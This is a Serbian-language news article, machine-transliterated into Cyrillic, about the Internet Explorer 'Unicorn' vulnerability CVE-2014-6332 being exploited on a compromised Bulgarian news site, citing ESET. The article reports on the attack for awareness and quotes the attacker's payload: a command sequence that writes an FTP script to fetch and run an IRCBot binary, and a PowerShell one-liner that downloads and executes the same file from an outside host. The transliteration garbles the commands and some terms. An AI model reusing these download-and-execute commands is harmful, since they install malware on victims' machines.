4Aug
Преглед садржаја
- Грешка „Уницорн“ у Интернет Екплореру се експлоатише у дивљини
- Детаљан напад
- Испод је датотека кода за страницу
Грешка „Уницорн“ у Интернет Екплореру се експлоатише у дивљини
Једнорог је име дато грешци пронађеној у Интернет Екплорер-у која омогућава нападачу да даљински изврши код на машини циљане жртве. Ова рањивост, позната као ЦВЕ-2014-6332, коју је открио истраживач безбедности ИБМ Кс-Форце, је значајна јер користи стару грешку која је присутна у верзијама Интернет Екплорер-а од 3 до 11. Другим речима, осим ако не користите древни систем из 80-их, ваш рачунар је рањив и саветујемо вам да ажурирате свој Виндовс одмах. Рањивост не само да може да је користи нападач за покретање произвољног кода на удаљеној машини, већ може и да заобиђе побољшану Сандбок заштићеног режима (ЕПМ) у ИЕ11, као и Мицрософтов бесплатни алат против експлоатације, Енханцед Митигатион Екпериенце Тоолкит (ЕМЕТ).
Детаљан напад
Концепт пуф пф ове рањивости је објављен у јавности негде прошле недеље. Пошто је мана у Интернет Екплорер-у, нападачу је потребна само веб локација да би циљао потенцијалне жртве.
ЕСЕТ је рекао да, „Претрагом наших података, пронашли смо неколико блокираних покушаја експлоатације док су наши корисници прегледавали велики бугарски веб-сајт. Као што сте могли да претпоставите, угрожена веб локација је користила ЦВЕ-2014-6332 да инсталира малвер на рачунаре својих несуђених посетилаца.Дотични сајт је новинска агенција и садржи чланке о неким победницима ријалитија. Уврштен међу 50 најпосећенијих сајтова у Бугарској и међу 11.000 првих у свету према Алека веб локација за рангирање Интернет страница, можда је само део прве значајне употребе овога у дивљини рањивост. До сада је примећено да постоји само једна страница на веб локацији која је компромитована и која служи овом експлоатацији, што вероватно указује на фазу тестирања.
Испод је датотека кода за страницу
Истакнути одељак указује на домен где се експлоатација налази. ЕСЕТ га открива као Вин32/Екплоит. ЦВЕ-2014-6332.А. Експлоатација је заснована на коду за доказ концепта који је објавио кинески истраживач. Ово је део који је изменио нападач. Нападач је користио Висуал Басиц скрипту за експлоатацију. Корисно оптерећење кода је низ команди које ће се извршити у командној линији машине жртве. то је следеће:
цд %ТЕМП%&
@ецхо опен царолинасрегион.орг>%ТЕМП%\КдФКкДлс.ткт&
@одјек [заштићено имејлом]>>%ТЕМП%\КдФКкДлс.ткт&
@ецхо [РЕДИГОВАНО]>>%ТЕМП%\КдФКкДлс.ткт&
@ецхо бинари>>%ТЕМП%\КдФКкДлс.ткт&
@ецхо гет натмасла.еке>>%ТЕМП%\КдФКкДлс.ткт&
@одјек! натмасла.еке>>%ТЕМП%\КдФКкДлс.ткт&
@одјек! дел натмасла.еке>>%ТЕМП%\КдФКкДлс.ткт&
@ецхо бие>>%ТЕМП%\КдФКкДлс.ткт&
фтп -с:%ТЕМП%\КдФКкДлс.ткт&
дел %ТЕМП%\КдФКкДлс.ткт
Прва група, са префиксом @ецхо, писаће команде у текстуалну датотеку („КдФКкДлс.ткт“, али име је другачије сваки пут када се повуче експлоатација). Затим се датотека прослеђује фтп команди. Он ће се повезати са фтп сервером са корисничким именом/лозинком, преузети бинарни фајл и извршити га.
Корисни терет има други део и у другом случају изгледа овако:
поверсхелл.еке (Нев-Објецт Систем. Нет. ВебЦлиент).ДовнлоадФиле(‘хккп://натмасла[.]ру/атх/сплоит/натмасла.еке’,’%ТЕМП%\натмасла.еке’);(Нев-Објецт -цом Схелл. Апплицатион).СхеллЕкецуте(‘%ТЕМП%\натмасла.еке’)
Овај пут користи ПоверСхелл за преузимање бинарног терета, који је заправо исти као онај који је преузео први корисни терет. ЕСЕТ је открио преузету бинарну датотеку као Вин32/ИРЦБот. НХР. Обим овог злонамерног софтвера је огроман, укључујући покретање ДДоС напада или отварање удаљених шкољки за злонамернике. Као смешна чињеница, садржи Ајнштајнов цитат „Свако ко никада није направио грешку, никада није покушао ништа ново.
Још увек нису пријављени прави напади који користе овај експлоат. Истраживачи су ово очекивали јер је реч о веома новом подвигу. Такође очекују да хакери почну да користе ову рупу у петљи врло брзо видећи број машина које су рањиве на напад. Корисницима се препоручује да користе Виндовс ажурирање и одмах закрпе своје рачунаре.